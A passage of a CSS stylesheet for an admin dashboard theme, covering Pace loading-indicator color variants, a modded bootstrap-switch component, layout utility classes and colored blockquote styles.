.pace-flash-white .pace .pace-progress-inner {
box-shadow: 0 0 10px #ffffff, 0 0 5px #ffffff;
}
.pace-flash-white .pace .pace-activity {
border-top-color: #ffffff;
border-left-color: #ffffff;
}
.pace-loading-bar-white .pace .pace-progress {
background: #ffffff;
color: #ffffff;
box-shadow: 120px 0 #1F2D3D, 240px 0 #1F2D3D;
}
.pace-loading-bar-white .pace .pace-activity {
box-shadow: inset 0 0 0 2px #ffffff, inset 0 0 0 7px #1F2D3D;
}
.pace-mac-osx-white .pace .pace-progress {
background-color: #ffffff;
box-shadow: inset -1px 0 #ffffff, inset 0 -1px #ffffff, inset 0 2px rgba(31, 45, 61, 0.5), inset 0 6px rgba(31, 45, 61, 0.3);
}
.pace-mac-osx-white .pace .pace-activity {
background-image: radial-gradient(rgba(31, 45, 61, 0.65) 0%, rgba(31, 45, 61, 0.15) 100%);
height: 12px;
}
.pace-progress-color-white .pace-progress {
color: #ffffff;
}
.pace-gray .pace .pace-progress {
background: #6c757d;
}
.pace-barber-shop-gray .pace {
background: #ffffff;
}
.pace-barber-shop-gray .pace .pace-progress {
background: #6c757d;
}
.pace-barber-shop-gray .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-gray .pace .pace-progress::after {
color: rgba(108, 117, 125, 0.2);
}
.pace-bounce-gray .pace .pace-activity {
background: #6c757d;
}
.pace-center-atom-gray .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-gray .pace-progress::before {
background: #6c757d;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-gray .pace-activity {
border-color: #6c757d;
}
.pace-center-atom-gray .pace-activity::after, .pace-center-atom-gray .pace-activity::before {
border-color: #6c757d;
}
.pace-center-circle-gray .pace .pace-progress {
background: rgba(108, 117, 125, 0.8);
color: #ffffff;
}
.pace-center-radar-gray .pace .pace-activity {
border-color: #6c757d transparent transparent;
}
.pace-center-radar-gray .pace .pace-activity::before {
border-color: #6c757d transparent transparent;
}
.pace-center-simple-gray .pace {
background: #ffffff;
border-color: #6c757d;
}
.pace-center-simple-gray .pace .pace-progress {
background: #6c757d;
}
.pace-material-gray .pace {
color: #6c757d;
}
.pace-corner-indicator-gray .pace .pace-activity {
background: #6c757d;
}
.pace-corner-indicator-gray .pace .pace-activity::after,
.pace-corner-indicator-gray .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-gray .pace .pace-activity::before {
border-right-color: rgba(108, 117, 125, 0.2);
border-left-color: rgba(108, 117, 125, 0.2);
}
.pace-corner-indicator-gray .pace .pace-activity::after {
border-top-color: rgba(108, 117, 125, 0.2);
border-bottom-color: rgba(108, 117, 125, 0.2);
}
.pace-fill-left-gray .pace .pace-progress {
background-color: rgba(108, 117, 125, 0.2);
}
.pace-flash-gray .pace .pace-progress {
background: #6c757d;
}
.pace-flash-gray .pace .pace-progress-inner {
box-shadow: 0 0 10px #6c757d, 0 0 5px #6c757d;
}
.pace-flash-gray .pace .pace-activity {
border-top-color: #6c757d;
border-left-color: #6c757d;
}
.pace-loading-bar-gray .pace .pace-progress {
background: #6c757d;
color: #6c757d;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-gray .pace .pace-activity {
box-shadow: inset 0 0 0 2px #6c757d, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-gray .pace .pace-progress {
background-color: #6c757d;
box-shadow: inset -1px 0 #6c757d, inset 0 -1px #6c757d, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-gray .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-gray .pace-progress {
color: #6c757d;
}
.pace-gray-dark .pace .pace-progress {
background: #343a40;
}
.pace-barber-shop-gray-dark .pace {
background: #ffffff;
}
.pace-barber-shop-gray-dark .pace .pace-progress {
background: #343a40;
}
.pace-barber-shop-gray-dark .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-gray-dark .pace .pace-progress::after {
color: rgba(52, 58, 64, 0.2);
}
.pace-bounce-gray-dark .pace .pace-activity {
background: #343a40;
}
.pace-center-atom-gray-dark .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-gray-dark .pace-progress::before {
background: #343a40;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-gray-dark .pace-activity {
border-color: #343a40;
}
.pace-center-atom-gray-dark .pace-activity::after, .pace-center-atom-gray-dark .pace-activity::before {
border-color: #343a40;
}
.pace-center-circle-gray-dark .pace .pace-progress {
background: rgba(52, 58, 64, 0.8);
color: #ffffff;
}
.pace-center-radar-gray-dark .pace .pace-activity {
border-color: #343a40 transparent transparent;
}
.pace-center-radar-gray-dark .pace .pace-activity::before {
border-color: #343a40 transparent transparent;
}
.pace-center-simple-gray-dark .pace {
background: #ffffff;
border-color: #343a40;
}
.pace-center-simple-gray-dark .pace .pace-progress {
background: #343a40;
}
.pace-material-gray-dark .pace {
color: #343a40;
}
.pace-corner-indicator-gray-dark .pace .pace-activity {
background: #343a40;
}
.pace-corner-indicator-gray-dark .pace .pace-activity::after,
.pace-corner-indicator-gray-dark .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-gray-dark .pace .pace-activity::before {
border-right-color: rgba(52, 58, 64, 0.2);
border-left-color: rgba(52, 58, 64, 0.2);
}
.pace-corner-indicator-gray-dark .pace .pace-activity::after {
border-top-color: rgba(52, 58, 64, 0.2);
border-bottom-color: rgba(52, 58, 64, 0.2);
}
.pace-fill-left-gray-dark .pace .pace-progress {
background-color: rgba(52, 58, 64, 0.2);
}
.pace-flash-gray-dark .pace .pace-progress {
background: #343a40;
}
.pace-flash-gray-dark .pace .pace-progress-inner {
box-shadow: 0 0 10px #343a40, 0 0 5px #343a40;
}
.pace-flash-gray-dark .pace .pace-activity {
border-top-color: #343a40;
border-left-color: #343a40;
}
.pace-loading-bar-gray-dark .pace .pace-progress {
background: #343a40;
color: #343a40;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-gray-dark .pace .pace-activity {
box-shadow: inset 0 0 0 2px #343a40, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-gray-dark .pace .pace-progress {
background-color: #343a40;
box-shadow: inset -1px 0 #343a40, inset 0 -1px #343a40, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-gray-dark .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-gray-dark .pace-progress {
color: #343a40;
}
/**
* bootstrap-switch - Turn checkboxes and radio buttons into toggle switches.
*
* @version v3.4 (MODDED)
* @homepage https://bttstrp.github.io/bootstrap-switch
* @author Mattia Larentis <mattia@larentis.eu> (http://larentis.eu)
* @license MIT
*/
.bootstrap-switch {
border: 1px solid #ced4da;
border-radius: 0.25rem;
cursor: pointer;
direction: ltr;
display: inline-block;
line-height: .5rem;
overflow: hidden;
position: relative;
text-align: left;
transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
vertical-align: middle;
z-index: 0;
}
.bootstrap-switch .bootstrap-switch-container {
border-radius: 0.25rem;
display: inline-block;
top: 0;
-webkit-transform: translate3d(0, 0, 0);
transform: translate3d(0, 0, 0);
}
.bootstrap-switch:focus-within {
box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}
.bootstrap-switch .bootstrap-switch-handle-on,
.bootstrap-switch .bootstrap-switch-handle-off,
.bootstrap-switch .bootstrap-switch-label {
box-sizing: border-box;
cursor: pointer;
display: table-cell;
font-size: 1rem;
font-weight: 500;
line-height: 1.2rem;
padding: .25rem .5rem;
vertical-align: middle;
}
.bootstrap-switch .bootstrap-switch-handle-on,
.bootstrap-switch .bootstrap-switch-handle-off {
text-align: center;
z-index: 1;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-default,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-default {
background: #e9ecef;
color: #1F2D3D;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-primary,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-primary {
background: #007bff;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-secondary,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-secondary {
background: #6c757d;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-success,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-success {
background: #28a745;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-info,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-info {
background: #17a2b8;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-warning,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-warning {
background: #ffc107;
color: #1F2D3D;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-danger,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-danger {
background: #dc3545;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-light,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-light {
background: #f8f9fa;
color: #1F2D3D;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-dark,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-dark {
background: #343a40;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-lightblue,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-lightblue {
background: #3c8dbc;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-navy,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-navy {
background: #001f3f;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-olive,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-olive {
background: #3d9970;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-lime,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-lime {
background: #01ff70;
color: #1F2D3D;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-fuchsia,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-fuchsia {
background: #f012be;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-maroon,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-maroon {
background: #d81b60;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-blue,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-blue {
background: #007bff;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-indigo,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-indigo {
background: #6610f2;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-purple,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-purple {
background: #6f42c1;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-pink,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-pink {
background: #e83e8c;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-red,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-red {
background: #dc3545;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-orange,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-orange {
background: #fd7e14;
color: #1F2D3D;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-yellow,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-yellow {
background: #ffc107;
color: #1F2D3D;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-green,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-green {
background: #28a745;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-teal,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-teal {
background: #20c997;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-cyan,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-cyan {
background: #17a2b8;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-white,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-white {
background: #ffffff;
color: #1F2D3D;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-gray,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-gray {
background: #6c757d;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on.bootstrap-switch-gray-dark,
.bootstrap-switch .bootstrap-switch-handle-off.bootstrap-switch-gray-dark {
background: #343a40;
color: #ffffff;
}
.bootstrap-switch .bootstrap-switch-handle-on {
border-bottom-left-radius: 0.1rem;
border-top-left-radius: 0.1rem;
}
.bootstrap-switch .bootstrap-switch-handle-off {
border-bottom-right-radius: 0.1rem;
border-top-right-radius: 0.1rem;
}
.bootstrap-switch input[type='radio'],
.bootstrap-switch input[type='checkbox'] {
filter: alpha(opacity=0);
left: 0;
margin: 0;
opacity: 0;
position: absolute;
top: 0;
visibility: hidden;
z-index: -1;
}
.bootstrap-switch.bootstrap-switch-mini .bootstrap-switch-handle-on,
.bootstrap-switch.bootstrap-switch-mini .bootstrap-switch-handle-off,
.bootstrap-switch.bootstrap-switch-mini .bootstrap-switch-label {
font-size: .875rem;
line-height: 1.5;
padding: .1rem .3rem;
}
.bootstrap-switch.bootstrap-switch-small .bootstrap-switch-handle-on,
.bootstrap-switch.bootstrap-switch-small .bootstrap-switch-handle-off,
.bootstrap-switch.bootstrap-switch-small .bootstrap-switch-label {
font-size: .875rem;
line-height: 1.5;
padding: .2rem .4rem;
}
.bootstrap-switch.bootstrap-switch-large .bootstrap-switch-handle-on,
.bootstrap-switch.bootstrap-switch-large .bootstrap-switch-handle-off,
.bootstrap-switch.bootstrap-switch-large .bootstrap-switch-label {
font-size: 1.25rem;
line-height: 1.3333333rem;
padding: .3rem .5rem;
}
.bootstrap-switch.bootstrap-switch-disabled, .bootstrap-switch.bootstrap-switch-readonly, .bootstrap-switch.bootstrap-switch-indeterminate {
cursor: default;
}
.bootstrap-switch.bootstrap-switch-disabled .bootstrap-switch-handle-on,
.bootstrap-switch.bootstrap-switch-disabled .bootstrap-switch-handle-off,
.bootstrap-switch.bootstrap-switch-disabled .bootstrap-switch-label, .bootstrap-switch.bootstrap-switch-readonly .bootstrap-switch-handle-on,
.bootstrap-switch.bootstrap-switch-readonly .bootstrap-switch-handle-off,
.bootstrap-switch.bootstrap-switch-readonly .bootstrap-switch-label, .bootstrap-switch.bootstrap-switch-indeterminate .bootstrap-switch-handle-on,
.bootstrap-switch.bootstrap-switch-indeterminate .bootstrap-switch-handle-off,
.bootstrap-switch.bootstrap-switch-indeterminate .bootstrap-switch-label {
cursor: default;
filter: alpha(opacity=50);
opacity: .5;
}
.bootstrap-switch.bootstrap-switch-animate .bootstrap-switch-container {
transition: margin-left .5s;
}
.bootstrap-switch.bootstrap-switch-inverse .bootstrap-switch-handle-on {
border-radius: 0 0.1rem 0.1rem 0;
}
.bootstrap-switch.bootstrap-switch-inverse .bootstrap-switch-handle-off {
border-radius: 0.1rem 0 0 0.1rem;
}
.bootstrap-switch.bootstrap-switch-on .bootstrap-switch-label,
.bootstrap-switch.bootstrap-switch-inverse.bootstrap-switch-off .bootstrap-switch-label {
border-bottom-right-radius: 0.1rem;
border-top-right-radius: 0.1rem;
}
.bootstrap-switch.bootstrap-switch-off .bootstrap-switch-label,
.bootstrap-switch.bootstrap-switch-inverse.bootstrap-switch-on .bootstrap-switch-label {
border-bottom-left-radius: 0.1rem;
border-top-left-radius: 0.1rem;
}
.jqstooltip {
height: auto !important;
padding: 5px !important;
width: auto !important;
}
.connectedSortable {
min-height: 100px;
}
.ui-helper-hidden-accessible {
border: 0;
clip: rect(0 0 0 0);
height: 1px;
margin: -1px;
overflow: hidden;
padding: 0;
position: absolute;
width: 1px;
}
.sort-highlight {
background: #f8f9fa;
border: 1px dashed #dee2e6;
margin-bottom: 10px;
}
.chart {
overflow: hidden;
position: relative;
}
.border-transparent {
border-color: transparent !important;
}
.description-block {
display: block;
margin: 10px 0;
text-align: center;
}
.description-block.margin-bottom {
margin-bottom: 25px;
}
.description-block > .description-header {
font-size: 16px;
font-weight: 600;
margin: 0;
padding: 0;
}
.description-block > .description-text {
text-transform: uppercase;
}
.description-block .description-icon {
font-size: 16px;
}
.list-group-unbordered > .list-group-item {
border-left: 0;
border-radius: 0;
border-right: 0;
padding-left: 0;
padding-right: 0;
}
.list-header {
color: #6c757d;
font-size: 15px;
font-weight: bold;
padding: 10px 4px;
}
.list-seperator {
background: rgba(0, 0, 0, 0.125);
height: 1px;
margin: 15px 0 9px;
}
.list-link > a {
color: #6c757d;
padding: 4px;
}
.list-link > a:hover {
color: #212529;
}
.user-block {
float: left;
}
.user-block img {
float: left;
height: 40px;
width: 40px;
}
.user-block .username,
.user-block .description,
.user-block .comment {
display: block;
margin-left: 50px;
}
.user-block .username {
font-size: 16px;
font-weight: 600;
margin-top: -1px;
}
.user-block .description {
color: #6c757d;
font-size: 13px;
margin-top: -3px;
}
.user-block.user-block-sm img {
width: 1.875rem;
height: 1.875rem;
}
.user-block.user-block-sm .username,
.user-block.user-block-sm .description,
.user-block.user-block-sm .comment {
margin-left: 40px;
}
.user-block.user-block-sm .username {
font-size: 14px;
}
.img-sm,
.img-md,
.img-lg {
float: left;
}
.img-sm {
height: 1.875rem;
width: 1.875rem;
}
.img-sm + .img-push {
margin-left: 2.5rem;
}
.img-md {
width: 3.75rem;
height: 3.75rem;
}
.img-md + .img-push {
margin-left: 4.375rem;
}
.img-lg {
width: 6.25rem;
height: 6.25rem;
}
.img-lg + .img-push {
margin-left: 6.875rem;
}
.img-bordered {
border: 3px solid #adb5bd;
padding: 3px;
}
.img-bordered-sm {
border: 2px solid #adb5bd;
padding: 2px;
}
.img-rounded {
border-radius: 0.25rem;
}
.img-circle {
border-radius: 50%;
}
.img-size-64,
.img-size-50,
.img-size-32 {
height: auto;
}
.img-size-64 {
width: 64px;
}
.img-size-50 {
width: 50px;
}
.img-size-32 {
width: 32px;
}
.size-32,
.size-40,
.size-50 {
display: block;
text-align: center;
}
.size-32 {
height: 32px;
line-height: 32px;
width: 32px;
}
.size-40 {
height: 40px;
line-height: 40px;
width: 40px;
}
.size-50 {
height: 50px;
line-height: 50px;
width: 50px;
}
.attachment-block {
background: #f8f9fa;
border: 1px solid rgba(0, 0, 0, 0.125);
margin-bottom: 10px;
padding: 5px;
}
.attachment-block .attachment-img {
float: left;
height: auto;
max-height: 100px;
max-width: 100px;
}
.attachment-block .attachment-pushed {
margin-left: 110px;
}
.attachment-block .attachment-heading {
margin: 0;
}
.attachment-block .attachment-text {
color: #495057;
}
.card > .overlay,
.card > .loading-img,
.overlay-wrapper > .overlay,
.overlay-wrapper > .loading-img,
.info-box > .overlay,
.info-box > .loading-img,
.small-box > .overlay,
.small-box > .loading-img {
height: 100%;
left: 0;
position: absolute;
top: 0;
width: 100%;
}
.card .overlay,
.overlay-wrapper .overlay,
.info-box .overlay,
.small-box .overlay {
border-radius: 0.25rem;
-ms-flex-align: center;
align-items: center;
background: rgba(255, 255, 255, 0.7);
display: -ms-flexbox;
display: flex;
-ms-flex-pack: center;
justify-content: center;
z-index: 50;
}
.card .overlay > .fa,
.card .overlay > .fas,
.card .overlay > .far,
.card .overlay > .fab,
.card .overlay > .glyphicon,
.card .overlay > .ion,
.overlay-wrapper .overlay > .fa,
.overlay-wrapper .overlay > .fas,
.overlay-wrapper .overlay > .far,
.overlay-wrapper .overlay > .fab,
.overlay-wrapper .overlay > .glyphicon,
.overlay-wrapper .overlay > .ion,
.info-box .overlay > .fa,
.info-box .overlay > .fas,
.info-box .overlay > .far,
.info-box .overlay > .fab,
.info-box .overlay > .glyphicon,
.info-box .overlay > .ion,
.small-box .overlay > .fa,
.small-box .overlay > .fas,
.small-box .overlay > .far,
.small-box .overlay > .fab,
.small-box .overlay > .glyphicon,
.small-box .overlay > .ion {
color: #343a40;
}
.card .overlay.dark,
.overlay-wrapper .overlay.dark,
.info-box .overlay.dark,
.small-box .overlay.dark {
background: rgba(0, 0, 0, 0.5);
}
.card .overlay.dark > .fa,
.card .overlay.dark > .fas,
.card .overlay.dark > .far,
.card .overlay.dark > .fab,
.card .overlay.dark > .glyphicon,
.card .overlay.dark > .ion,
.overlay-wrapper .overlay.dark > .fa,
.overlay-wrapper .overlay.dark > .fas,
.overlay-wrapper .overlay.dark > .far,
.overlay-wrapper .overlay.dark > .fab,
.overlay-wrapper .overlay.dark > .glyphicon,
.overlay-wrapper .overlay.dark > .ion,
.info-box .overlay.dark > .fa,
.info-box .overlay.dark > .fas,
.info-box .overlay.dark > .far,
.info-box .overlay.dark > .fab,
.info-box .overlay.dark > .glyphicon,
.info-box .overlay.dark > .ion,
.small-box .overlay.dark > .fa,
.small-box .overlay.dark > .fas,
.small-box .overlay.dark > .far,
.small-box .overlay.dark > .fab,
.small-box .overlay.dark > .glyphicon,
.small-box .overlay.dark > .ion {
color: #ced4da;
}
.ribbon-wrapper {
height: 70px;
overflow: hidden;
position: absolute;
right: -2px;
top: -2px;
width: 70px;
z-index: 10;
}
.ribbon-wrapper.ribbon-lg {
height: 120px;
width: 120px;
}
.ribbon-wrapper.ribbon-lg .ribbon {
right: 0px;
top: 26px;
width: 160px;
}
.ribbon-wrapper.ribbon-xl {
height: 180px;
width: 180px;
}
.ribbon-wrapper.ribbon-xl .ribbon {
right: 4px;
top: 47px;
width: 240px;
}
.ribbon-wrapper .ribbon {
box-shadow: 0 0 3px rgba(0, 0, 0, 0.3);
font-size: 0.8rem;
line-height: 100%;
padding: 0.375rem 0;
position: relative;
right: -2px;
text-align: center;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.4);
text-transform: uppercase;
top: 10px;
-webkit-transform: rotate(45deg);
transform: rotate(45deg);
width: 90px;
}
.ribbon-wrapper .ribbon::before, .ribbon-wrapper .ribbon::after {
border-left: 3px solid transparent;
border-right: 3px solid transparent;
border-top: 3px solid #9e9e9e;
bottom: -3px;
content: '';
position: absolute;
}
.ribbon-wrapper .ribbon::before {
left: 0;
}
.ribbon-wrapper .ribbon::after {
right: 0;
}
.back-to-top {
bottom: 1.25rem;
position: fixed;
right: 1.25rem;
z-index: 1032;
}
.back-to-top:focus {
box-shadow: none;
}
pre {
padding: .75rem;
}
blockquote {
background: #ffffff;
border-left: 0.7rem solid #007bff;
margin: 1.5em .7rem;
padding: 0.5em .7rem;
}
.box blockquote {
background: #e9ecef;
}
blockquote p:last-child {
margin-bottom: 0;
}
blockquote h1,
blockquote h2,
blockquote h3,
blockquote h4,
blockquote h5,
blockquote h6 {
color: #007bff;
font-size: 1.25rem;
font-weight: 600;
}
blockquote.quote-primary {
border-color: #007bff;
}
blockquote.quote-primary h1,
blockquote.quote-primary h2,
blockquote.quote-primary h3,
blockquote.quote-primary h4,
blockquote.quote-primary h5,
blockquote.quote-primary h6 {
color: #007bff;
}
blockquote.quote-secondary {
border-color: #6c757d;
}
blockquote.quote-secondary h1,
blockquote.quote-secondary h2,
blockquote.quote-secondary h3,
blockquote.quote-secondary h4,
blockquote.quote-secondary h5,
blockquote.quote-secondary h6 {
color: #6c757d;
}
blockquote.quote-success {
border-color: #28a745;
}
blockquote.quote-success h1,
blockquote.quote-success h2,
blockquote.quote-success h3,
blockquote.quote-success h4,
blockquote.quote-success h5,
blockquote.quote-success h6 {
color: #28a745;
}
blockquote.quote-info {
border-color: #17a2b8;
}
blockquote.quote-info h1,
blockquote.quote-info h2,
blockquote.quote-info h3,
blockquote.quote-info h4,
blockquote.quote-info h5,
blockquote.quote-info h6 {
color: #17a2b8;
}
blockquote.quote-warning {
border-color: #ffc107;
}
blockquote.quote-warning h1,
blockquote.quote-warning h2,
blockquote.quote-warning h3,
blockquote.quote-warning h4,
blockquote.quote-warning h5,
blockquote.quote-warning h6 {
color: #ffc107;
}
blockquote.quote-danger {
border-color: #dc3545;
}
blockquote.quote-danger h1,
blockquote.quote-danger h2,
blockquote.quote-danger h3,
blockquote.quote-danger h4,
blockquote.quote-danger h5,
blockquote.quote-danger h6 {
color: #dc3545;
}
blockquote.quote-light {
border-color: #f8f9fa;
}
blockquote.quote-light h1,
blockquote.quote-light h2,
blockquote.quote-light h3,
blockquote.quote-light h4,
blockquote.quote-light h5,
blockquote.quote-light h6 {
color: #f8f9fa;
}
blockquote.quote-dark {
border-color: #343a40;
}
blockquote.quote-dark h1,
blockquote.quote-dark h2,
blockquote.quote-dark h3,
blockquote.quote-dark h4,
blockquote.quote-dark h5,
blockquote.quote-dark h6 {
color: #343a40;
}
blockquote.quote-lightblue {
border-color: #3c8dbc;
}
blockquote.quote-lightblue h1,
blockquote.quote-lightblue h2,
blockquote.quote-lightblue h3,
blockquote.quote-lightblue h4,
blockquote.quote-lightblue h5,
blockquote.quote-lightblue h6 {
color: #3c8dbc;
}
blockquote.quote-navy {
border-color: #001f3f;
}
blockquote.quote-navy h1,
blockquote.quote-navy h2,
blockquote.quote-navy h3,
blockquote.quote-navy h4,
blockquote.quote-navy h5,
blockquote.quote-navy h6 {
color: #001f3f;
}
blockquote.quote-olive {
border-color: #3d9970;
}
blockquote.quote-olive h1,
blockquote.quote-olive h2,
blockquote.quote-olive h3,
blockquote.quote-olive h4,
blockquote.quote-olive h5,
blockquote.quote-olive h6 {
color: #3d9970;
}
blockquote.quote-lime {
border-color: #01ff70;
}
blockquote.quote-lime h1,
blockquote.quote-lime h2,
blockquote.quote-lime h3,
blockquote.quote-lime h4,
blockquote.quote-lime h5,
blockquote.quote-lime h6 {
color: #01ff70;
}
blockquote.quote-fuchsia {
border-color: #f012be;
}
blockquote.quote-fuchsia h1,
blockquote.quote-fuchsia h2,
blockquote.quote-fuchsia h3,
blockquote.quote-fuchsia h4,
blockquote.quote-fuchsia h5,
blockquote.quote-fuchsia h6 {
color: #f012be;
}
blockquote.quote-maroon {
border-color: #d81b60;
}
blockquote.quote-maroon h1,
blockquote.quote-maroon h2,
blockquote.quote-maroon h3,
blockquote.quote-maroon h4,
blockquote.quote-maroon h5,
blockquote.quote-maroon h6 {
color: #d81b60;
}
blockquote.quote-blue {
border-color: #007bff;
}
blockquote.quote-blue h1,
blockquote.quote-blue h2,
blockquote.quote-blue h3,
blockquote.quote-blue h4,
blockquote.quote-blue h5,
blockquote.quote-blue h6 {
color: #007bff;
}
blockquote.quote-indigo {
border-color: #6610f2;
}
blockquote.quote-indigo h1,
blockquote.quote-indigo h2,
blockquote.quote-indigo h3,
blockquote.quote-indigo h4,
blockquote.quote-indigo h5,
blockquote.quote-indigo h6 {
color: #6610f2;
}
blockquote.quote-purple {
border-color: #6f42c1;
}
blockquote.quote-purple h1,
blockquote.quote-purple h2,
blockquote.quote-purple h3,
blockquote.quote-purple h4,
blockquote.quote-purple h5,
blockquote.quote-purple h6 {
color: #6f42c1;
}
blockquote.quote-pink {
border-color: #e83e8c;
}
blockquote.quote-pink h1,
blockquote.quote-pink h2,
blockquote.quote-pink h3,
blockquote.quote-pink h4,
blockquote.quote-pink h5,
blockquote.quote-pink h6 {
color: #e83e8c;
}
blockquote.quote-red {
border-color: #dc3545;
}
blockquote.quote-red h1,
blockquote.quote-red h2,
blockquote.quote-red h3,
blockquote.quote-red h4,
blockquote.quote-red h5,
blockquote.quote-red h6 {
color: #dc3545;
}
blockquote.quote-orange {
border-color: #fd7e14;
}
blockquote.quote-orange h1,
blockquote.quote-orange h2,
blockquote.quote-orange h3,
blockquote.quote-orange h4,
blockquote.quote-orange h5,
blockquote.quote-orange h6 {
color: #fd7e14;
}
blockquote.quote-yellow {
border-color: #ffc107;
}
blockquote.quote-yellow h1,
blockquote.quote-yellow h2,
blockquote.quote-yellow h3,
blockquote.quote-yellow h4,
blockquote.quote-yellow h5,
blockquote.quote-yellow h6 {
color: #ffc107;
}
blockquote.quote-green {
border-color: #28a745;
}
blockquote.quote-green h1,
blockquote.quote-green h2,
blockquote.quote-green h3,
blockquote.quote-green h4,
blockquote.quote-green h5,
blockquote.quote-green h6 {
color: #28a745;
}
blockquote.quote-teal {
border-color: #20c997;
}
blockquote.quote-teal h1,
blockquote.quote-teal h2,
blockquote.quote-teal h3,
blockquote.quote-teal h4,
blockquote.quote-teal h5,
blockquote.quote-teal h6 {
color: #20c997;
}
blockquote.quote-cyan {
border-color: #17a2b8;
}
blockquote.quote-cyan h1,
blockquote.quote-cyan h2,
blockquote.quote-cyan h3,
blockquote.quote-cyan h4,
blockquote.quote-cyan h5,
